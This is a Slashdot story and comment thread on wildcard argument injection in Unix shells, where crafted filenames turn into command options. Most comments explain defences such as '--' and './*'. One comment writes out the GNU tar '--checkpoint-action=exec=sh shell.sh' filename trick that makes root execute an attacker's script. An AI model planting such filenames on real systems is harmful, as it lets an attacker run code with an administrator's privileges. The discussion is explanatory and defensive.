Security Unix Linux

Exploiting Wildcards On Linux/Unix 215

An anonymous reader writes: DefenseCode researcher Leon Juranic found security issues related to using wildcards in Unix commands. The topic has been discussed in the past on the Full Disclosure mailing list, where some people saw this more as a feature than as a bug. There are clearly a number of potential security issues surrounding this, so Mr. Juranic provided five actual exploitation examples that stress the risks accompanying the practice of using the * wildcard with Linux/Unix commands. The issue can manifest when using specific options of chown, tar, rsync, etc. By using specially crafted filenames, an attacker can inject arbitrary arguments into shell commands run by other users, including root.
This discussion has been archived. No new comments can be posted.

  • Question... -- ? (Score:5, Informative)

    by beh ( 4759 ) * on Friday June 27, 2014 @10:14AM (#47332419)

    Who does NOT use -- in their scripts, if they're safety conscious?

            rm -i -- *

    Problem solved?

    Normal programs should stop processing options after a (standalone) "--" and take everything following it as regular parameters. getopt and similar libraries handle this automatically.

    I really wouldn't class the "use of wildcards" itself as a security risk; the security risk is a developer who doesn't know what he's doing.
    Would command-line handling be a security risk if someone added a --superuser-rm option to his code and then executed "rm -rf /" as root immediately afterwards?
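    A minimal sketch of the injection beh is guarding against, using a throwaway /tmp directory (the directory name and filenames are illustrative):

    ```shell
    # Create a scratch directory with one normal file and one
    # attacker-controlled filename that looks like an option.
    mkdir -p /tmp/wildcard-demo && cd /tmp/wildcard-demo
    touch regular.txt
    touch -- '-rf'

    # Without --, the shell expands * and rm parses "-rf" as options:
    #   rm *   becomes   rm -rf regular.txt
    # With --, option processing stops; "-rf" is treated as an
    # ordinary filename and both files are simply deleted:
    rm -- *
    ls -A          # prints nothing: the directory is now empty
    ```
    
    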

  • by Anonymous Coward on Friday June 27, 2014 @10:17AM (#47332439)

    Posting the answer to this useless story, which was posted to FD:

    Date: Thu, 26 Jun 2014 12:55:42 -0700
    From: Michal Zalewski

    > We wanted to inform all major *nix distributions via our responsible
    > disclosure policy about this problem before posting it

    I'm not sure how to put it mildly, but I think you might have been
    scooped on this some 1-2 decades ago...

    Off the top of my head, there's a rant about this behavior in "The
    Unix-Haters Handbook", and there are several highly detailed articles
    by David Wheeler published over the years (e.g.,
    http://www.dwheeler.com/essays/filenames-in-shell.html).

    Yup, it's a counterintuitive behavior that leads to security problems.
    The odds of changing the semantics at this point are very slim. Other
    operating systems have their own idiosyncrasies in this area - for
    example, Windows is not a lot better with parameter splitting and
    special filenames. /mz

  • Question... -- ? (Score:4, Informative)

    by Marneus68 ( 2329096 ) on Friday June 27, 2014 @10:24AM (#47332489)
    After years of using command-line programs daily, I had never heard of -- before today. It was never brought up in school, nor did I ever see a specific thread or blog post on the subject. So to answer your question: I don't. I've never heard of it before. Where did you learn about it?
  • Re:Question... -- ? (Score:2, Informative)

    by PIBM ( 588930 ) on Friday June 27, 2014 @10:38AM (#47332635) Homepage

    Are you running commands as root on stuff when you don't know where it came from?

    If you absolutely have to run a command in a folder where someone else has upload or file-creation rights, then at least use ./* if the tool doesn't support --.

    This is not an issue if you work recursively on the directory that holds their files, which should cover most situations. A bad admin can run commands that are just as dangerous, or worse, pretty fast!

    Always be cautious when running someone else's shell script; that's even more dangerous.
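    A quick sketch of the ./* fallback mentioned above, for tools that may not support -- (directory and filenames are illustrative):

    ```shell
    # Same crafted-filename setup as before.
    mkdir -p /tmp/dotslash-demo && cd /tmp/dotslash-demo
    touch -- '-rf' 'data.txt'

    # ./* expands to ./-rf and ./data.txt; neither begins with '-',
    # so the crafted name can no longer be mistaken for an option:
    rm ./*
    ls -A          # prints nothing
    ```
    
    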

  • Re: Question... -- ? (Score:2, Informative)

    by Anonymous Coward on Friday June 27, 2014 @10:44AM (#47332683)

    rm ./--

  • Re:Question... -- ? (Score:5, Informative)

    by hawguy ( 1600213 ) on Friday June 27, 2014 @10:46AM (#47332705)

    You've never had a stupid program crash and create a file named "--" or something similar in its working directory? Now try to remove that file without knowing about the "--" command-line convention.

    rm ./--

  • Re:Question... -- ? (Score:4, Informative)

    by fnj ( 64210 ) on Friday June 27, 2014 @11:36AM (#47333191)

    Most admins find out about -- after they accidentally create a file with a name like "-f". Go ahead, try to delete a file named "-f" any other way.

    rm ./-f
    is the most dead-simple way of doing it, and it's portable to non-GNU systems, although even BSD has the double-dash option nowadays.

    And there is always the old standby of insulating the operation from bash command line expansion:
    perl -e 'unlink "-f";'

    You could also, within a minute or so, write and compile a literally two-line C program to remove it. I don't understand the mystery.
    #include <unistd.h>
    int main() { unlink("-f"); }

  • Re:Question... -- ? (Score:5, Informative)

    by Chris Mattern ( 191822 ) on Friday June 27, 2014 @12:12PM (#47333595)

    Can someone explain to me why all these program manpage references have e.g. "(1)" after them?

    It's the manpage section. Section 1 is general commands, for example, while section 3 is library calls. Thus, if you want to see the man page for the printf command, you can say "man 1 printf", while if you want to see the man page for the printf library function, you can say "man 3 printf".

  • Re:Question... -- ? (Score:5, Informative)

    by virx ( 459384 ) on Friday June 27, 2014 @12:35PM (#47333875)

    man man

                  The table below shows the section numbers of the manual followed by the types of pages they contain.

                  1 Executable programs or shell commands

                  2 System calls (functions provided by the kernel)

                  3 Library calls (functions within program libraries)

                  4 Special files (usually found in /dev)

                  5 File formats and conventions, e.g. /etc/passwd

                  6 Games

                  7 Miscellaneous (including macro packages and conventions), e.g. man(7), groff(7)

                  8 System administration commands (usually only for root)

                  9 Kernel routines [Non standard]

  • by AC-x ( 735297 ) on Friday June 27, 2014 @12:52PM (#47334067)

    Since one is root, one can do anything anyway so why bother with all this misdirection?

    Because you can trick a more privileged user into executing commands for you by writing files into your own folder. Most of the examples given were of admin housekeeping tasks run against a user-writable folder.
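    The best-known instance of this is the GNU tar checkpoint trick: the attacker seeds a writable directory with filenames that tar will parse as options when root globs over it. A sketch (the directory, shell.sh, and the pwned marker file are illustrative names; the option-filenames are GNU tar's real --checkpoint options):

    ```shell
    # In a directory writable by the attacker, create a payload script
    # plus two filenames that GNU tar would parse as options.
    mkdir -p /tmp/tar-demo && cd /tmp/tar-demo
    echo 'id > /tmp/tar-demo/pwned' > shell.sh
    touch ./'--checkpoint=1'
    touch ./'--checkpoint-action=exec=sh shell.sh'

    # If an admin later runs, in this directory:
    #   tar cf /dev/null *
    # the shell expands * to the crafted names and GNU tar executes
    # shell.sh with the admin's privileges.
    ls -A
    ```
    
    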

  • Re:what about? (Score:5, Informative)

    by Anonymous Coward on Friday June 27, 2014 @01:25PM (#47334341)

    Unless you were, say, in /etc, this wouldn't really do much harm. The only file containing a . in my / is initrd.img, which, even if it weren't a symlink, is easy to regenerate.

    -r is the recursive switch causing it to visit every sub directory.

    So, rm -rf *.* would delete any file in the entire file system with a . in it....including, as you point out, /etc.

    No, it wouldn't!

    The shell expands the wildcards before calling the command. All rm sees is "initrd.img" as argv[2].

    rm will not see the *.* at all unless the shell can't expand the wildcard to any valid file or directory name; and even if the shell had to pass the *.* through as-is to rm (i.e., if *.* didn't match anything in /), rm still wouldn't find anything matching /etc/*.*, because it doesn't do any glob()-ing itself. Why would it? The shell already did that.

    Furthermore, -r means "visit any subdirs of the dirs given as arguments to rm", not "all directories there ever were and ever will be".

    TL;DR: You have no idea what the hell you're talking about.

    Damn it, /. You used to be cool and know this stuff. :-(
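    The expansion order described above is easy to verify from a shell; the command only ever sees the already-expanded names, never the glob itself (directory and filenames below are illustrative, and the unmatched-glob behavior assumes bash/sh defaults, i.e. nullglob off):

    ```shell
    # The shell, not the command, performs glob expansion.
    mkdir -p /tmp/glob-demo && cd /tmp/glob-demo
    touch a.txt b.txt

    printf '%s\n' *.*          # prints: a.txt  b.txt  (expanded by the shell)
    printf '%s\n' *.nomatch    # no match: the literal string is passed through
    ```
    
    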
